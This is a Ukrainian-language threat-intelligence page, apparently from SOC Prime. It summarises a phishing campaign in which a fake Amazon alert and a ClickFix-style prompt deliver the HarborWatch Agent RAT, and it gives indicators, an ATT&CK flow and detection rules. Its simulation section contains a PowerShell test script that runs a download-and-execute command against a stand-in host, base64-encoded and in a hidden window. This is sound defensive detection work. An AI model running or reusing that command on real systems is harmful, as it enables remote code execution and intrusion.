SOC Prime Bias: Середній

09 Jun 2026 13:04 UTC
newspaper icon cofense.com

Від підробленого сповіщення безпеки Amazon до доставки агента HarborWatch

Author Photo
SOC Prime Team linkedin icon Стежити
Від підробленого сповіщення безпеки Amazon до доставки агента HarborWatch
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Резюме

У звіті описується фішингова кампанія, заснована на підробленому попередженні безпеки Amazon, яка обманює жертв виконати команду PowerShell через підказку в стилі ClickFix. Ця команда завантажує шкідливий виконуваний файл під назвою mysql.exe, який насправді є троянським клієнтом RAT HarborWatch Agent. Після запуску шкідливе ПЗ підключається до сервера керування та передачі даних і передає інформацію про хост. Операція покладається на подібні до справжніх домени та метод самозараження, що зловживання поведінкою користувача, щоб уникнути виявлення на основі традиційних вкладень.

Розслідування

Cofense відстежив кампанію від підробленої адреси відправника через шкідливі домени, завантажувач PowerShell і кінцевий шкідливий завантажуваний файл. Динамічний аналіз mysql.exe виявив вихідне з’єднання з сервером керування та управління за адресою 185.193.127.44 та використання шляхів API /api/agent/tasks/ and /api/heartbeat. Аналіз пам’яті також виявив ідентифікатор HarborWatchAgent/c-1.1.1.

Зм’якшення

Організації повинні блокувати ідентифіковані шкідливі домени та IP-адреси, обмежити виконання PowerShell закодованих команд, моніторити несподівані створення mysql.exe в каталозі Temp , та посилити захист електронної пошти від імітації бренду та підроблених попереджень.

Відповідь

Якщо ця активність виявлена, ізолюйте уражену кінцеву точку, завершіть процес HarborWatch Agent, зберіть судову інформацію та розгорніть блокування на основі індикаторів у всьому середовищі. Користувачам також слід попередити про підроблене попередження безпеки Amazon, і захист від фішингу повинен бути оновлений, щоб уловити подібні пастки.

"graph TB %% Class definitions classDef action fill:#99ccff classDef malware fill:#ff6666 classDef process fill:#ffcc99 classDef file fill:#cccccc %% Nodes initial_access_phishing["<b>Action</b> – <b>T1566.002 Спаровий фішинг через посилання</b><br/>Лист виглядає як від Amazon і містить шкідливе посилання на верифікацію."] class initial_access_phishing action user_execution_malicious_link["<b>Action</b> – <b>T1204.001 Виконання зловмисної команди через посилання</b><br/>Жертва клацає на посилання та переходить на сторінку, що інструктує скопіювати та вставити команду PowerShell."] class user_execution_malicious_link action user_execution_copy_paste["<b>Action</b> – <b>T1204.004 Виконання команди через копіювання-вставку</b><br/>Скопійована команда PowerShell виконується локально."] class user_execution_copy_paste action obfuscation_obfuscated_files["<b>Action</b> – <b>T1027 Зашифровані файли або інформація</b> & <b>T1027.018 Невидимі Unicode</b><br/>Команда PowerShell закодована в base64 і містить приховані Unicode символи."] class obfuscation_obfuscated_files action deobfuscate_decode["<b>Action</b> – <b>T1140 Дешифрування/Декодування файлів або інформації</b><br/>Команда декодує навантаження під час виконання."] class deobfuscate_decode action hide_artifact_hidden_window["<b>Action</b> – <b>T1564.003 Приховане вікно</b><br/>PowerShell виконується з параметром -w hidden, щоб уникнути відображення інтерфейсу."] class hide_artifact_hidden_window action ingress_tool_transfer["<b>Action</b> – <b>T1105 Передача інструменту вхідного потоку</b><br/>Сценарій завантажує другий етап сценарію PowerShell (code.txt) з віддаленого сервера."] class ingress_tool_transfer action server_software_component["<b>Action</b> – <b>T1505 Компонент програмного забезпечення сервера</b><br/>Другий сценарій отримує та виконує навантаження (mysql.exe), розміщене в %TEMP%."] class server_software_component action remote_access_tool["<b>Malware</b> – <b>T1219 Інструмент віддаленого доступу</b><br/>Виконується спеціальний RAT під назвою HarborWatch Agent."] class remote_access_tool malware discovery_security_software["<b>Action</b> – <b>T1518.001 Виявлення програмного забезпечення безпеки</b><br/>RAT збирає інформацію про програмне забезпечення безпеки."] class discovery_security_software action discovery_hardware["<b>Action</b> – <b>T1592.001 Виявлення апаратного забезпечення</b><br/>RAT збирає деталі про апаратне забезпечення хоста."] class discovery_hardware action discovery_network_appliances["<b>Action</b> – <b>T1590.006 Мережеві пристрої безпеки</b><br/>RAT перелічує пристрої мережевої безпеки."] class discovery_network_appliances action discovery_log_enumeration["<b>Action</b> – <b>T1654 Перелік логів</b><br/>RAT перелічує журнали подій."] class discovery_log_enumeration action discovery_threat_vendor["<b>Action</b> – <b>T1681 Пошук даних постачальників загроз</b><br/>RAT шукає інформацію про загрози."] class discovery_threat_vendor action c2_bidirectional["<b>Action</b> – <b>T1102.002 Двостороннє спілкування через веб-сервіс</b><br/>Дані надсилаються на сервер C2 через HTTPS."] class c2_bidirectional action c2_oneway["<b>Action</b> – <b>T1102.003 Одностороннє спілкування через веб-сервіс</b><br/>Додаткові інструкції отримані через HTTPS."] class c2_oneway action c2_dynamic_resolution["<b>Action</b> – <b>T1568 Динамічна резолюція</b><br/>RAT вирішує домени C2 під час виконання."] class c2_dynamic_resolution action c2_dga["<b>Action</b> – <b>T1568.002 Генератор алгоритмів домену</b><br/>Список доменів згенерований алгоритмічно."] class c2_dga action c2_dead_drop_resolver["<b>Action</b> – <b>T1102.001 Dead Drop Resolver</b><br/>Отримує додаткові інструкції C2 з dead‑drop сайту."] class c2_dead_drop_resolver action exfiltration_c2["<b>Action</b> – <b>T1041 Екфільтрація через C2-канал</b><br/>Зібрана інформація ексфільтрується через той самий веб-канал."] class exfiltration_c2 action exfiltration_alternative["<b>Action</b> – <b>T1048 Екфільтрація через альтернативний протокол</b><br/>Використовується альтернативний протокол для ексфільтрації даних."] class exfiltration_alternative action discovery_cloud_dashboard["<b>Action</b> – <b>T1538 Панель обслуговування хмар</b><br/>Дані відображаються на панелі керування китайською мовою (Harbor Sentinel)."] class discovery_cloud_dashboard action %% Connections initial_access_phishing –>|веде до| user_execution_malicious_link user_execution_malicious_link –>|веде до| user_execution_copy_paste user_execution_copy_paste –>|запускає| obfuscation_obfuscated_files obfuscation_obfuscated_files –>|декодується| deobfuscate_decode deobfuscate_decode –>|виконує| hide_artifact_hidden_window hide_artifact_hidden_window –>|завантажує| ingress_tool_transfer ingress_tool_transfer –>|завантажує| server_software_component server_software_component –>|виконує| remote_access_tool remote_access_tool –>|проводить| discovery_security_software remote_access_tool –>|проводить| discovery_hardware remote_access_tool –>|проводить| discovery_network_appliances remote_access_tool –>|проводить| discovery_log_enumeration remote_access_tool –>|проводить| discovery_threat_vendor remote_access_tool –>|спілкується через| c2_bidirectional remote_access_tool –>|отримує через| c2_oneway c2_bidirectional –>|використовує| c2_dynamic_resolution c2_dynamic_resolution –>|використовує| c2_dga c2_oneway –>|використовує| c2_dead_drop_resolver remote_access_tool –>|ексфільтрує через| exfiltration_c2 exfiltration_c2 –>|може також використовувати| exfiltration_alternative remote_access_tool –>|повідомляє до| discovery_cloud_dashboard "

Потік атак

Виявлення

Можливі шаблони ClickFix атаки в командному рядку (через cmdline)

Команда SOC Prime
09 червня 2026

Перегляд

Можливість виконання через приховані командні рядки PowerShell (через cmdline)

Команда SOC Prime
09 червня 2026

Перегляд

Підозрілі рядки PowerShell (через cmdline)

Команда SOC Prime
09 червня 2026

Перегляд

Підозрілі рядки PowerShell (через powershell)

Команда SOC Prime
09 червня 2026

Перегляд

Виклик підозрілих методів .NET з PowerShell (через powershell)

Команда SOC Prime
09 червня 2026

Перегляд

IOC (HashSha256) для виявлення: від підробленого попередження безпеки Amazon до постачання HarborWatch Agent ClickFix користувацького RAT моніторингу

Правила AI SOC Prime
09 червня 2026

Перегляд

IOC (HashMd5) для виявлення: від підробленого попередження безпеки Amazon до постачання HarborWatch Agent ClickFix користувацького RAT моніторингу

Правила AI SOC Prime
09 червня 2026

Перегляд

IOC (SourceIP) для виявлення: від підробленого попередження безпеки Amazon до постачання HarborWatch Agent ClickFix користувацького RAT моніторингу

Правила AI SOC Prime
09 червня 2026

Перегляд

IOC (DestinationIP) для виявлення: від підробленого попередження безпеки Amazon до постачання HarborWatch Agent ClickFix користувацького RAT моніторингу

Правила AI SOC Prime
09 червня 2026

Перегляд

Виконання mysql.exe зі специфічним аргументом пароля [створення процесу в Windows]

Правила AI SOC Prime
09 червня 2026

Перегляд

Виявлення спілкування C2 HarborWatch Agent [підключення до мережі в Windows]

Правила AI SOC Prime
09 червня 2026

Перегляд

Виявлення виконання PowerShell з обфускацією та прихованим вікном [Windows PowerShell]

Правила AI SOC Prime
09 червня 2026

Перегляд

Виконання моделювання

Передумова: перевірка телеметрії та базові підготовчі перевірки повинні бути пройдені.

Обгрунтування: У цьому розділі детально описується точне виконання техніки нападника (TTP), розробленої для запуску правила виявлення. Команди та наратив ПОВИННІ безпосередньо відображати визначені TTP та мають на меті створити ту ж саму телеметрію, яку очікує логіка виявлення.

  • Опис атаки та команди:
    Атакувач отримав доступ до кінцевої точки і хоче завантажити та виконати шкідливе навантаження, залишаючись прихованим від користувача. Вони створюють однорядкову команду PowerShell, яка:

    1. Виконується без профілю (-nop) щоб уникнути завантаження користувацьких профілів.
    2. Запускається у прихованому вікні (-w hidden) щоб уникнути відображення інтерфейсу користувача (T1564.003).
    3. Вбудовує скрипт зворотної оболонки закодований в base64 для уникнення простого виявлення рядків (T1027.010).
    4. Виконує декодований скрипт через -EncodedCommand, використовуючи PowerShell як підписаний бінарний файл (T1218).

    Створена командна строка відповідає правилам Sigma CommandLine|contains фільтрам, тим самим генеруючи очікуване попередження.

  • Скрипт для регресійного тестування:

    # -------------------------------------------------
# Шкідливе виконання PowerShell, яке повинно викликати правило Sigma
# -------------------------------------------------
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://malicious.example.com/payload.ps1")'
$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$cmd = "-nop -w hidden -EncodedCommand $b64"
Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" `
    -ArgumentList $cmd `
    -WindowStyle Hidden
# Кінець скрипту

  • Команди очищення:

    # Завершення всіх залишків шкідливих процесів PowerShell
Get-Process -Name powershell -ErrorAction SilentlyContinue | Stop-Process -Force

# Видалення тимчасових файлів (жодного не створено в цьому випадку)
# Видалення змінної навантаження base64 з сесії (за бажанням)
Remove-Variable -Name b64 -ErrorAction SilentlyContinue

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно